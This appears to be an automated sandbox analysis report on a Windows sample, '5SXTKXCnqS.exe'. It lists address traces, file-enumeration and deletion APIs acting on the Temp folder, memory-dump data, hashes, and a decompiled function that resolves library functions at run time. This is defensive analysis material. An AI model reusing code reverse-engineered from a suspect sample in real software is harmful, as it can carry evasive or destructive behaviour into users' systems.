                                                                                    0x004054f3
                                                                                    0x004054f3
                                                                                    0x00405500
                                                                                    0x00405503
                                                                                    0x0040550e
                                                                                    0x00405514
                                                                                    0x00405519
                                                                                    0x00405529
                                                                                    0x0040552b
                                                                                    0x00405531
                                                                                    0x00405534
                                                                                    0x00405537
                                                                                    0x004055f4
                                                                                    0x004055f4
                                                                                    0x004055f8
                                                                                    0x004055fa
                                                                                    0x004055fa
                                                                                    0x004055fa
                                                                                    0x004055fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040553d
                                                                                    0x0040553d
                                                                                    0x00405546
                                                                                    0x0040554c
                                                                                    0x00405551
                                                                                    0x00405554
                                                                                    0x00405556
                                                                                    0x0040555a
                                                                                    0x0040555c
                                                                                    0x0040555c
                                                                                    0x0040555a
                                                                                    0x0040555f
                                                                                    0x00405562
                                                                                    0x00405575
                                                                                    0x00405577
                                                                                    0x0040557c
                                                                                    0x00405583
                                                                                    0x0040559b
                                                                                    0x004055a1
                                                                                    0x004055a7
                                                                                    0x004055a9
                                                                                    0x004055ce
                                                                                    0x004055ab
                                                                                    0x004055ab
                                                                                    0x004055af
                                                                                    0x004055c3
                                                                                    0x004055b1
                                                                                    0x004055b4
                                                                                    0x004055b9
                                                                                    0x004055bb
                                                                                    0x004055bc
                                                                                    0x004055bc
                                                                                    0x004055af
                                                                                    0x00405585
                                                                                    0x0040558b
                                                                                    0x0040558d
                                                                                    0x00405593
                                                                                    0x00405593
                                                                                    0x0040558d
                                                                                    0x00000000
                                                                                    0x00405583
                                                                                    0x00405564
                                                                                    0x00405567
                                                                                    0x00405569
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040556b
                                                                                    0x0040556d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040556f
                                                                                    0x00405573
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004055d3
                                                                                    0x004055dd
                                                                                    0x004055e3
                                                                                    0x004055e3
                                                                                    0x004055ee
                                                                                    0x00000000
                                                                                    0x004055ee
                                                                                    0x00405505
                                                                                    0x0040550c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004054cb
                                                                                    0x004054cb
                                                                                    0x004054cd
                                                                                    0x004055fe
                                                                                    0x00405601
                                                                                    0x00405604
                                                                                    0x00405656
                                                                                    0x00405656
                                                                                    0x00405656
                                                                                    0x00405606
                                                                                    0x00405609
                                                                                    0x00405614
                                                                                    0x00405619
                                                                                    0x0040561b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040561e
                                                                                    0x00405624
                                                                                    0x0040562a
                                                                                    0x00405630
                                                                                    0x00405632
                                                                                    0x00000000
                                                                                    0x0040564e
                                                                                    0x00405634
                                                                                    0x00405638
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040563d
                                                                                    0x00405642
                                                                                    0x00405643
                                                                                    0x00000000
                                                                                    0x00405644
                                                                                    0x0040560b
                                                                                    0x0040560b
                                                                                    0x00000000
                                                                                    0x0040560b
                                                                                    0x004054d3
                                                                                    0x004054d7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004054d7

                                                                                    APIs
                                                                                    • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,7519F560), ref: 004054A9
                                                                                    • lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,7519F560), ref: 004054F3
                                                                                    • lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,7519F560), ref: 00405514
                                                                                    • lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,7519F560), ref: 0040551A
                                                                                    • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,7519F560), ref: 0040552B
                                                                                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                    • FindClose.KERNEL32(?), ref: 004055EE
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\5SXTKXCnqS.exe" , xrefs: 00405495
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                    • \*.*, xrefs: 004054ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\5SXTKXCnqS.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                    • API String ID: 2035342205-4269505240
                                                                                    • Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                    • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                    • Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                    • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA1A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E73CA1A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73CA1215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73CA1215();
				_t320 = E73CA123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E73CA12FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73CA1534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73ca2259) & 0x000000ff) * 4 +  &M73CA21CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73CA1224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73CA1215();
											 &_v12 = E73CA1A36( &_v12);
											__eax = E73CA1429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73CA1A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73CA1A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x73ca305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73CA1A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323);
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E73CA15C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E73CA12FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E73CA15C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323);
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E73CA12FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E73CA12FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E73CA12FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E73CA1224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E73CA12FE(_t90) * 4);
					goto L165;
				}
			}



































































                                                                                    0x73ca1aa0
                                                                                    0x73ca1aa3
                                                                                    0x73ca1aa6
                                                                                    0x73ca1aa9
                                                                                    0x73ca1aac
                                                                                    0x73ca1aaf
                                                                                    0x73ca1ab2
                                                                                    0x73ca1ab4
                                                                                    0x73ca1ab7
                                                                                    0x73ca1aba
                                                                                    0x73ca1abf
                                                                                    0x73ca1ac2
                                                                                    0x73ca1aca
                                                                                    0x73ca1ad2
                                                                                    0x73ca1ad4
                                                                                    0x73ca1ad7
                                                                                    0x73ca1adf
                                                                                    0x73ca1adf
                                                                                    0x73ca1ae4
                                                                                    0x73ca1ae7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1af1
                                                                                    0x73ca1af3
                                                                                    0x73ca1af8
                                                                                    0x73ca1afa
                                                                                    0x73ca1b8b
                                                                                    0x73ca1b8b
                                                                                    0x73ca1b8b
                                                                                    0x73ca1b8f
                                                                                    0x73ca1b92
                                                                                    0x73ca1b94
                                                                                    0x73ca1bb6
                                                                                    0x73ca1bb9
                                                                                    0x73ca1bbb
                                                                                    0x73ca1bc4
                                                                                    0x73ca1bca
                                                                                    0x73ca1bcc
                                                                                    0x73ca1bd2
                                                                                    0x73ca1bd2
                                                                                    0x73ca1bd8
                                                                                    0x73ca1bdb
                                                                                    0x73ca1bdb
                                                                                    0x73ca1bde
                                                                                    0x73ca1bde
                                                                                    0x73ca1be4
                                                                                    0x73ca1be6
                                                                                    0x73ca1be9
                                                                                    0x73ca1bef
                                                                                    0x73ca1bf2
                                                                                    0x73ca1bf2
                                                                                    0x73ca1bf4
                                                                                    0x73ca1bfa
                                                                                    0x73ca1bfd
                                                                                    0x73ca1c21
                                                                                    0x73ca1c24
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1c27
                                                                                    0x73ca1c29
                                                                                    0x73ca1c37
                                                                                    0x73ca1c3a
                                                                                    0x73ca1c3c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1c3e
                                                                                    0x73ca1c3e
                                                                                    0x73ca1c3e
                                                                                    0x73ca1c44
                                                                                    0x73ca1c46
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1c48
                                                                                    0x73ca1c4a
                                                                                    0x73ca1c4c
                                                                                    0x73ca1c4e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1c4e
                                                                                    0x73ca1c50
                                                                                    0x73ca1c52
                                                                                    0x73ca1c54
                                                                                    0x73ca1c54
                                                                                    0x73ca1c5a
                                                                                    0x73ca1c60
                                                                                    0x73ca1c62
                                                                                    0x73ca1c76
                                                                                    0x73ca1c76
                                                                                    0x73ca1c78
                                                                                    0x73ca1c64
                                                                                    0x73ca1c6a
                                                                                    0x73ca1c6d
                                                                                    0x73ca1c6d
                                                                                    0x00000000
                                                                                    0x73ca1bff
                                                                                    0x73ca1bff
                                                                                    0x73ca1bff
                                                                                    0x73ca1c00
                                                                                    0x73ca1c08
                                                                                    0x73ca1c0c
                                                                                    0x73ca1c12
                                                                                    0x73ca1c16
                                                                                    0x00000000
                                                                                    0x73ca1c16
                                                                                    0x73ca1c02
                                                                                    0x73ca1c02
                                                                                    0x73ca1c03
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1c05
                                                                                    0x73ca1c06
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1c06
                                                                                    0x73ca1b96
                                                                                    0x73ca1b97
                                                                                    0x73ca1ba0
                                                                                    0x73ca1ba3
                                                                                    0x73ca1bb0
                                                                                    0x73ca1bb0
                                                                                    0x73ca1ba5
                                                                                    0x73ca1ba5
                                                                                    0x73ca1c7e
                                                                                    0x73ca1c81
                                                                                    0x73ca1c84
                                                                                    0x73ca1cf6
                                                                                    0x73ca1cfa
                                                                                    0x73ca1adc
                                                                                    0x00000000
                                                                                    0x73ca1adc
                                                                                    0x00000000
                                                                                    0x73ca1cfa
                                                                                    0x73ca1b94
                                                                                    0x73ca1b00
                                                                                    0x73ca1b03
                                                                                    0x73ca1b66
                                                                                    0x73ca1b69
                                                                                    0x73ca1b7a
                                                                                    0x73ca1b7a
                                                                                    0x73ca1b7d
                                                                                    0x73ca1c89
                                                                                    0x73ca1c8c
                                                                                    0x73ca1c8c
                                                                                    0x73ca1c8e
                                                                                    0x73ca2033
                                                                                    0x73ca2045
                                                                                    0x73ca2045
                                                                                    0x73ca2047
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2037
                                                                                    0x73ca2038
                                                                                    0x73ca203b
                                                                                    0x73ca203e
                                                                                    0x73ca20ba
                                                                                    0x73ca20c1
                                                                                    0x73ca20c6
                                                                                    0x73ca20c9
                                                                                    0x73ca1cf2
                                                                                    0x73ca1cf2
                                                                                    0x73ca1cf2
                                                                                    0x73ca1cf3
                                                                                    0x00000000
                                                                                    0x73ca1cf3
                                                                                    0x73ca2040
                                                                                    0x73ca2042
                                                                                    0x73ca2042
                                                                                    0x73ca2049
                                                                                    0x73ca204b
                                                                                    0x73ca20ae
                                                                                    0x73ca1ce7
                                                                                    0x73ca1cea
                                                                                    0x73ca1ced
